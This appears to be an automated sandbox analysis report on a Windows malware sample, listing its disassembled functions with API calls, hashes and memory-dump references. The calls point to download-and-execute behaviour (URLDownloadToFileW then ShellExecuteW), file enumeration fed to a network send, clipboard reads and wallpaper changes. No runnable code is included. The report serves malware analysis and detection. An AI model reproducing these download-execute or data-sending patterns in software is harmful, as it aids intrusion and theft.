                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1157919129-0
                                                                                                                                                    • Opcode ID: 6e741ec391e5a106599270c9402cb1534c94f41b29a53e162eb70f9f63c8c73a
                                                                                                                                                    • Instruction ID: 82aa40abc2f26b33ad37d367892f78810cec33bf0a992e639233d724b2737e98
                                                                                                                                                    • Opcode Fuzzy Hash: 6e741ec391e5a106599270c9402cb1534c94f41b29a53e162eb70f9f63c8c73a
                                                                                                                                                    • Instruction Fuzzy Hash: A0811B76A02219DBCB15DBA0DC90DEDB7B8BF14214F14426AE456A7190FF30BB49CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D2610 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                      • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C8274
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8281
                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 156D271C
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 156D2777
                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 156D2786
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,156C4A6C,00000040,?,156C4B8C,00000055,00000000,?,?,00000055,00000000), ref: 156D27CE
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,156C4AEC,00000040), ref: 156D27ED
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 745075371-0
                                                                                                                                                    • Opcode ID: c308cae231e8faebbf210b4fee0bfce7dd3489cc861d7d0329f834d4d447acad
                                                                                                                                                    • Instruction ID: 4757df52c633e764ccfc9265ab0bccfa02cfd36615a49462074607948d61d3a2
                                                                                                                                                    • Opcode Fuzzy Hash: c308cae231e8faebbf210b4fee0bfce7dd3489cc861d7d0329f834d4d447acad
                                                                                                                                                    • Instruction Fuzzy Hash: E2517275A15319ABDB20DFA4CC80ABEF7B9FF18320F010869E995E7150DB71A940CBE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 15688811
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,156E6608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 156888CA
                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 156888F2
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 156888FF
                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15688A15
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1771804793-0
                                                                                                                                                    • Opcode ID: 1ee2e581effd7ca8486d7f8b809b65f31cb5afa21d183c9a9aaf785affbcdae4
                                                                                                                                                    • Instruction ID: f7ca4653f80e2146b99b72e1a0f42d1b98a2764b7ed16dc2c1f5c4c8baa241fe
                                                                                                                                                    • Opcode Fuzzy Hash: 1ee2e581effd7ca8486d7f8b809b65f31cb5afa21d183c9a9aaf785affbcdae4
                                                                                                                                                    • Instruction Fuzzy Hash: 87517076A02309AACF04FBA4DD959ED77BDAF10210F500659E80AA3190FF34BB48CBD5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15686EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 15686FBC
                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 156870A0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DownloadExecuteFileShell
                                                                                                                                                    • String ID: C:\Users\user\Desktop\fu56fbrtn8.exe$open
                                                                                                                                                    • API String ID: 2825088817-2507530114
                                                                                                                                                    • Opcode ID: 8e8c88a4268a5d504704f2ad11950c6291b477005ceffe9d1e441f2c4cfe41a7
                                                                                                                                                    • Instruction ID: f352e888483ce43469cf367c7218aa6465dd2ef7cca0cb934d71f909ff5d1766
                                                                                                                                                    • Opcode Fuzzy Hash: 8e8c88a4268a5d504704f2ad11950c6291b477005ceffe9d1e441f2c4cfe41a7
                                                                                                                                                    • Instruction Fuzzy Hash: F461C579B0A3049BCE14EF74CC649BE33AAAF91554F40091DE543576C0EE35BA19C3EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 1569CAD7
                                                                                                                                                      • Part of subcall function 1569376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,156E611C), ref: 1569377E
                                                                                                                                                      • Part of subcall function 1569376F: RegSetValueExA.ADVAPI32(156E611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,1569CAB1,WallpaperStyle,156E611C,00000001,156F4EE0,00000000), ref: 156937A6
                                                                                                                                                      • Part of subcall function 1569376F: RegCloseKey.ADVAPI32(156E611C,?,?,1569CAB1,WallpaperStyle,156E611C,00000001,156F4EE0,00000000,?,1568875D,00000001), ref: 156937B1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                    • API String ID: 4127273184-3576401099
                                                                                                                                                    • Opcode ID: 8140208ec793d37a0143cfc40285381f56c989480149d46b8167f95a0c532681
                                                                                                                                                    • Instruction ID: 4d7e0f7b4518685aa68700557364f46a7afcb18002f511b7d4923f1f220d702e
                                                                                                                                                    • Opcode Fuzzy Hash: 8140208ec793d37a0143cfc40285381f56c989480149d46b8167f95a0c532681
                                                                                                                                                    • Instruction Fuzzy Hash: 49116076F432502BF809B13D8D67FAE3A16D342650F840259E5022F6CEDC931A50C2EB
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D1CD8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                      • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,156C4A73,?,?,?,?,156C44CA,?,00000004), ref: 156D1DBA
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 156D1E4A
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 156D1E58
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,156C4A73,00000000,156C4B93), ref: 156D1EFB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4212172061-0
                                                                                                                                                    • Opcode ID: 9f6a78cdb6aa1bfea8706b99ac304b1f0b5d204cce7d793a6b25321d28adbb0a
                                                                                                                                                    • Instruction ID: eb1f24d4fa2986e30c7565d9d3a1b87b4571c4662eb2eefe2bbb9ca722fec4a6
                                                                                                                                                    • Opcode Fuzzy Hash: 9f6a78cdb6aa1bfea8706b99ac304b1f0b5d204cce7d793a6b25321d28adbb0a
                                                                                                                                                    • Instruction Fuzzy Hash: 6261D77AA05706EAD7149B74CC85EA6F3A8FF08310F11086AE986D7580EBB5F940C7E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                    • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                    • API String ID: 481472006-2430845779
                                                                                                                                                    • Opcode ID: 02704ebb8ed5b899cd8d0a54c49dde9aab206211621f70543302bfc8036f9d3d
                                                                                                                                                    • Instruction ID: a87abd2cb3bd76f0edca54e649a3535b10a7fd6ebcd89720649a64a665b8215e
                                                                                                                                                    • Opcode Fuzzy Hash: 02704ebb8ed5b899cd8d0a54c49dde9aab206211621f70543302bfc8036f9d3d
                                                                                                                                                    • Instruction Fuzzy Hash: F2112E766193049BC704DB65D8509FFB3E8AB58210F500A1EF496832D0EF38FA49C6EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D20C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                      • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C8274
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8281
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 156D2117
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 156D2168
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 156D2228
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2829624132-0
                                                                                                                                                    • Opcode ID: 765ed17e0d0e76392ba8b5e3ebbf16138c7b18f65d61a833a14bb10a1f900adc
                                                                                                                                                    • Instruction ID: c9cd6440e4200da4cc2e3fb2a99a394c553e19c4b9dbf7fa270f7f4056da7a9b
                                                                                                                                                    • Opcode Fuzzy Hash: 765ed17e0d0e76392ba8b5e3ebbf16138c7b18f65d61a833a14bb10a1f900adc
                                                                                                                                                    • Instruction Fuzzy Hash: D761A471A143079BDB28DF24CC81BAAF7A9FF04320F1085B9EE55C6944EB74E981DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156B3837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,156B34BF,00000034,?,?,00000000), ref: 156B3849
                                                                                                                                                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,156B3552,00000000,?,00000000), ref: 156B385F
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,156B3552,00000000,?,00000000,1569E251), ref: 156B3871
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1815803762-0
                                                                                                                                                    • Opcode ID: c18adcc90e19f005b34187daa74e6d6d75700cc730dd9b201f3edd59aeaf1a5d
                                                                                                                                                    • Instruction ID: 872220176c23ac0e18fbe561b69cd69e939a5546545b353df7642eb820660a5b
                                                                                                                                                    • Opcode Fuzzy Hash: c18adcc90e19f005b34187daa74e6d6d75700cc730dd9b201f3edd59aeaf1a5d
                                                                                                                                                    • Instruction Fuzzy Hash: DEE09231718261BAE7304E26AC08F463A6AEB81770F21093DFA55E40D4D7A28404C7D5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C32B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,156C328B,00000000,156EE948,0000000C,156C33E2,00000000,00000002,00000000), ref: 156C32D6
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,156C328B,00000000,156EE948,0000000C,156C33E2,00000000,00000002,00000000), ref: 156C32DD
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 156C32EF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                    • Opcode ID: 94672a0f77573be6173bded8b3e3c9f45fb6cd6be9d6ae1b53fdfafe2d2c71c0
                                                                                                                                                    • Instruction ID: 949fe7169815f9ce522aa4341bb529d149ff4359b158fdb85e43397ca0cdfea1
                                                                                                                                                    • Opcode Fuzzy Hash: 94672a0f77573be6173bded8b3e3c9f45fb6cd6be9d6ae1b53fdfafe2d2c71c0
                                                                                                                                                    • Instruction Fuzzy Hash: 95E0BF31521258ABCF216F64C949A983B6EFF40256F004458FD4A46625CF3AEA42CAC4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 1568B711
                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 1568B71D
                                                                                                                                                    • CloseClipboard.USER32 ref: 1568B725
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$CloseDataOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2058664381-0
                                                                                                                                                    • Opcode ID: 6c0d773b1b0af2c33175bc174be5cc04fee4e11494fe1b8391bda14a9558917c
                                                                                                                                                    • Instruction ID: 35a2d580b0669b9861b0388167b5ef5304d2ce29ea96c24de6c93837f53a7943
                                                                                                                                                    • Opcode Fuzzy Hash: 6c0d773b1b0af2c33175bc174be5cc04fee4e11494fe1b8391bda14a9558917c
                                                                                                                                                    • Instruction Fuzzy Hash: 7AE0EC3565A7209FC7109A609C88F9E6A59AF55F61F82891CFC869A194CB309800C7E1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156B4C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 156B4C6B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2325560087-3916222277
                                                                                                                                                    • Opcode ID: 38b1f878dd1ae0f733fc6235e5d65c82e8f3cf555a8801e3a43d6c0dd900c48e
                                                                                                                                                    • Instruction ID: 7931d0e5662e9b557fa1a321efabafea7d4cd1c3de257e5472a52b2d7a142fa2
                                                                                                                                                    • Opcode Fuzzy Hash: 38b1f878dd1ae0f733fc6235e5d65c82e8f3cf555a8801e3a43d6c0dd900c48e
                                                                                                                                                    • Instruction Fuzzy Hash: B15169B1E14219DBEB14CF65C4D169ABBF9FB48355F20816ED816EB240D7B49A00CFE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156CE879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: .
                                                                                                                                                    • API String ID: 0-248832578
                                                                                                                                                    • Opcode ID: a7c17e100ee4bcd18cad788e9ca3916bd76082232eba794403c8ce031b650919
                                                                                                                                                    • Instruction ID: 778d88d59dbb25136ba4db42a4d0eff6f754745057339fa4ea35805adb3db989
                                                                                                                                                    • Opcode Fuzzy Hash: a7c17e100ee4bcd18cad788e9ca3916bd76082232eba794403c8ce031b650919
                                                                                                                                                    • Instruction Fuzzy Hash: 6B312876900159AFCB15CE78CC84EEA7BBEEF45314F0002E9E859D7291E630AD45CBD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C88ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,156C44CA,?,00000004), ref: 156C8940
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID: GetLocaleInfoEx
                                                                                                                                                    • API String ID: 2299586839-2904428671
                                                                                                                                                    • Opcode ID: 69a2c37c97b1557d71d6fe33430bc15bc2e8c4d50368da7f9ce4a8dce21a9bb7
                                                                                                                                                    • Instruction ID: e4097950e4b211245da65c14be88dc804198189b5338b7cac2929b396f5c921d
                                                                                                                                                    • Opcode Fuzzy Hash: 69a2c37c97b1557d71d6fe33430bc15bc2e8c4d50368da7f9ce4a8dce21a9bb7
                                                                                                                                                    • Instruction Fuzzy Hash: 55F09635A0121CF7CB119F64CC44EAEBB6AEF58661F004A99FC5567250CF316D10DAD9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C61F0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                                                                                    • Instruction ID: 76cc8c5821608f37a15f65042a4fb9e33461e8958883fdb4036565fa04917d89
                                                                                                                                                    • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                                                                                    • Instruction Fuzzy Hash: A6020A71E012199BDF14CFADC88069DB7B1FF88324F2582AAD919E7384D731AE41CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568783C Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 15687857
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 1568791F
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
